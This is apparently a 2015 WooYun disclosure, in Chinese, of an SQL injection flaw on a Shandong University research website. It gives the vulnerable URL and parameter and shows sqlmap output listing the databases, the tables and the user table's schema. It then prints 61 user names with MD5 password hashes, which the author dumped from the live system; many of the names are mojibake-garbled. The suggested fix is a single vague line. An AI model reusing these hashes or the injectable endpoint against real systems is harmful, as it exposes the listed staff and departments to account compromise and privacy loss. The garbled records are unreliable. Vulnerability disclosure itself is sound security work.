漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-095007
漏洞标题:山东大学某网站SQL注射漏洞,用户数据挺大
相关厂商:山东大学
漏洞作者: letboy
提交时间:2015-02-03 14:39
修复时间:2015-02-08 14:40
公开时间:2015-02-08 14:40
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:9
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-03: 细节已通知厂商并且等待厂商处理中
2015-02-08: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
山东大学某网站SQL注射漏洞,用户数据挺多的。没时间了,就dump出一些
详细说明:
http://www.rd.sdu.edu.cn/newsDetail?sno=news1422238689967 此网页有sql注射漏洞,上sqlmap跑一跑
web application technology: JSP
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] sduorataweb
[*] test
sduorataweb和test中用户数据很多
编码有点乱,
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: sduorataweb
[19 tables]
+---------------------------+
| news_info |
| pub_authorities |
| pub_authorities_resources |
| pub_menu |
| pub_org |
| pub_org_desc |
| pub_resources |
| pub_resources_menus |
| pub_roles |
| pub_roles_authorities |
| pub_sys_param |
| pub_users |
| pub_users_roles |
| sdu_activity_info |
| sdu_contact |
| sdu_faculty |
| sdu_news |
| user_activity_type |
| user_news_type |
+---------------------------+
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: sduorataweb
Table: pub_users
[15 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| enable | char(1) |
| err_times | varchar(4) |
| is_sys | char(1) |
| mail | varchar(64) |
| qq_weixin | varchar(32) |
| user_account | varchar(32) |
| user_birthday | varchar(12) |
| user_desc | varchar(128) |
| user_duty | varchar(32) |
| user_gender | char(1) |
| user_id | varchar(32) |
| user_name | varchar(64) |
| user_org | varchar(32) |
| user_password | varchar(32) |
| user_telephone | varchar(20) |
+----------------+--------------+
用户很多
漏洞证明:
列出一小部分,其他数据没dump出来
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: sduorataweb
Table: pub_users
[61 entries]
+-----------------------------------+----------------------------------+
| user_name | user_password |
+-----------------------------------+----------------------------------+
| 任�利 | 066813794cbf095f772eb6080b3775f0 |
| 体育å¦é™¢ | 1bb356b8099e3512dc2bea78c7e49210 |
| ä¿¡æ�¯ç§‘å¦ä¸Žå·¥ç¨‹å¦é™¢ | 9f5dd80fdf16ed6b03a3ba64077a8ebc |
| 傅茂笋 | 400749545f4453165269dc09683d6321 |
| å„’å¦é«˜ç‰ç ”究院 | 3c21c1a7a7b6de51ec8a555b984c0def |
| 公共å�«ç”Ÿå¦é™¢ | 6fd062bd066d10cdc1ca9ba0d7ce62c6 |
| 刘全芬 | 602248d146e6e13bb9356f3c8dc326f6 |
| 刘德� | 97f2e06e89e1425fdc8b7ce878314947 |
| 刘� | 4f644bf087c383b30bf3c674f1f3d7b5 |
| 刘樱红 | 7b0d7e717e3c59d369d966d3b7b47b10 |
| 刘�刚 | 37518deab62a1a07b49c4f8f5fe8d434 |
| 刘高远 | eb4081f7f343c039f55f67183ad110d6 |
| 化å¦ä¸ŽåŒ–å·¥å¦é™¢ | 6b26e0c12c7d8c9c78087156fd850e9d |
| 医å¦é™¢ | 1980c2d87a86abb7385510a3673ba57a |
| å�«ç”Ÿç®¡ç�†ä¸Žæ”¿ç–ç ”ç©¶ä¸å¿ƒ | bd55ed33379be5b2885db1cde6cd336e |
| 历å�²æ–‡åŒ–å¦é™¢ | cd8c99a2f61e18bd4fbaecf31a3ee833 |
| å�£è…”医å¦é™¢ | 4fb0e5d2f845668cea1db6c700c726ae |
| 周敬馨 | 293ace9056262d59803ef87a7d306dd2 |
| 周桂� | 05d992a1233181d323da998f0da1635c |
| 哲å¦ä¸Žç¤¾ä¼šå�‘展å¦é™¢ | 0b11f32425e8272bb0f497f274ea6694 |
| å›½å®¶ç³–å·¥ç¨‹æŠ€æœ¯ç ”ç©¶ä¸å¿ƒ | 817ebf0023917cd28f68c25da86dc9ef |
| 国际教育å¦é™¢ | 758819760d4b6d6c40603f349b978ebe |
| 土建与水利å¦é™¢ | bc807c06dd99d503478317da328bd0b0 |
| 外国è¯å¦é™¢ | 0564acecbafb6e42a75cc6ceb0a290da |
| å¨�æµ·æ ¡åŒº | fd197f06e4ba7c7c722f7be16b1f8435 |
| å™ä¹�军 | e69fd2beeba7d382d65d43479244a07c |
| å™å�› | 58552168024c47092689ef29fe1f72aa |
| å™å²© | 69329ceb1b86f4995c6c015d6a9cc7f5 |
| å¼ å¸Œå�Ž | e6272190ee10977acc7d66accea4c071 |
| å¼ å»º | cd15edaa0173e2f982da9625c9a7b19f |
| å¼ æ˜¥å�Ž | 7ce5c0eb07b809cb13782ccdb40ea8f3 |
| å¼ çŽ‰ç”Ÿ | 7e3dac7129b0740ff64ced86266c4ddd |
| å¼ ç�³ | 0d5d2b98d44e5e295010f35075fb9da8 |
| �阳 | 3dba715d80298812788d90e1cc17a189 |
| 护ç�†å¦é™¢ | a27b78a3ee07b9c9eaefcc77c4646b46 |
| 控制科å¦ä¸Žå·¥ç¨‹å¦é™¢ | 59522684758b7d941134d07aafd6b18d |
| 政治å¦ä¸Žå…¬å…±ç®¡ç�†å¦é™¢ | 71ac94fd64472f0d28ffe793aaa573e3 |
| æ•°å¦å¦é™¢ | ad80e97cd271ea3015a4ee786462fc64 |
| æ–‡å�²å“²ç ”究院 | a7eb00eae2ee92e771fcb3c6173099c0 |
| æ–‡å¦ä¸Žæ–°é—»ä¼ æ’å¦é™¢ | 38e59e303e4afd03fd56efa63f3202ae |
| 晶体æ��æ–™ç ”ç©¶æ‰€ | 53152a5bbb951cf1f6a5e7548a6d2472 |
| 朱纪� | 77a3db69a87734855a73bd7e69148f4c |
| 机械工程å¦é™¢ | ef3d2791523b4c6df5f98431a986bbf2 |
| �勇 | beb64953fcb4ab5080a2ca33c4c08b8c |
| æ��料科å¦ä¸Žå·¥ç¨‹å¦é™¢ | 3bc7e39b1481647e676fca8086fdd059 |
| �清茹 | 45e9c174826db1d979c701f5a7a66f6b |
| æž—ç¡• | 49bbaae717df7beb08b7d911e9e1b3fb |
| æ ¾ç»´ä¸œ | 13abf8bb725d21bc934b9f9379b2bf56 |
| �宗磊 | c29c1e44bd6994066b761b020e9ccc3b |
| 法å¦é™¢ | 2cc4d86098a2e6ed63fbc872ee3a21f7 |
| 牛娟玲 | 3ab4d4cfa630fcadc3e7b166d24076bc |
| 物ç�†å¦é™¢ | 3e1402e974fffd6441ce5878d215b001 |
| 环境科å¦ä¸Žå·¥ç¨‹å¦é™¢ | 089c99e47686725a1bb5c36b1bad1dbd |
| 生命科å¦å¦é™¢ | e6c2263db7c626031c72ac69089da3cd |
| 田锦 | 3ce59328538ae2e059e7cdc7bf4bb158 |
| 电气工程å¦é™¢ | f8730c8b06076361238995fa478a4e11 |
| ç››æ¥ | b5f9d7714330cf3540e7d4d54b82d6d2 |
| 第二医院 | 584942ce77f716e2e187fbea0b1e74d1 |
| 管�员 | 8013fa1365b50731eb313075d272b95e |
| 管ç�†å¦é™¢ | db806043a71c2d1b23c3ce6fba62b4e1 |
| ç»�济å¦é™¢ | 4c24fbb7cbd696314e9ae06aa7af7594 |
+-----------------------------------+----------------------------------+
修复方案:
1 sql注射避免方法很多的
版权声明:转载请注明来源 letboy@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-02-08 14:40
厂商回复:
最新状态:
暂无